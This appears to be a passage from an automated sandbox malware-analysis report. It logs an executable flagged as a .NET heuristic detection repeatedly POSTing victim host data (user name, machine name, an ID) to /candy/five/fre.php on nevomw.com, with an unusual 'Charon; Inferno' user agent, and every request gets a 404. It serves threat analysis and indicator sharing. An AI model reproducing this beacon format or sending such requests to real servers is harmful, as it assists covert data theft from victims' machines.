                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:03.445830107 CET | 200 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:03.522391081 CET | 200 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            48 | 192.168.2.6 | 49764 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:04.207113028 CET | 201 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:04.260684013 CET | 202 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:04.333813906 CET | 202 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            49 | 192.168.2.6 | 49765 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:05.339663982 CET | 203 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:05.391392946 CET | 203 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:05.464608908 CET | 203 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.6 | 49717 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:43.786463022 CET | 64 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:43.841705084 CET | 64 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:43.916834116 CET | 65 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            50 | 192.168.2.6 | 49766 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:05.740205050 CET | 204 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:05.793560982 CET | 204 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:05.865657091 CET | 205 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            51 | 192.168.2.6 | 49767 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:06.108568907 CET | 206 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:06.161303043 CET | 206 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:06.249782085 CET | 206 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            52 | 192.168.2.6 | 49768 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:06.554063082 CET | 207 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:06.606434107 CET | 207 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:06.678922892 CET | 208 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            53 | 192.168.2.6 | 49769 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:06.984148026 CET | 209 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.035990000 CET | 209 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.107873917 CET | 209 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            54 | 192.168.2.6 | 49770 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:07.369520903 CET | 210 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.422445059 CET | 210 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.495950937 CET | 211 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            55 | 192.168.2.6 | 49771 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:07.847165108 CET | 212 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.900952101 CET | 212 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.981039047 CET | 212 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            56 | 192.168.2.6 | 49772 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:10.181925058 CET | 213 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:10.236537933 CET | 213 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:10.313579082 CET | 214 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            57 | 192.168.2.6 | 49773 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:10.569443941 CET | 215 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:10.633315086 CET | 215 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:10.708132982 CET | 215 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            58 | 192.168.2.6 | 49774 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:11.023775101 CET | 216 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:11.075879097 CET | 216 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:11.152570009 CET | 217 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            59 | 192.168.2.6 | 49775 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:11.449891090 CET | 217 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:11.502696991 CET | 218 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:11.577105045 CET | 218 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.6 | 49718 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:44.367507935 CET | 67 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:44.424026966 CET | 67 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:44.495388985 CET | 67 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            60 | 192.168.2.6 | 49776 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:11.948579073 CET | 219 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.003648996 CET | 219 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.076914072 CET | 220 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            61 | 192.168.2.6 | 49778 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:12.388055086 CET | 281 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.440466881 CET | 281 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.513309956 CET | 281 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            62 | 192.168.2.6 | 49779 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:12.790592909 CET | 283 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.842472076 CET | 283 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.934709072 CET | 290 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            63 | 192.168.2.6 | 49781 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:13.252512932 CET | 374 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
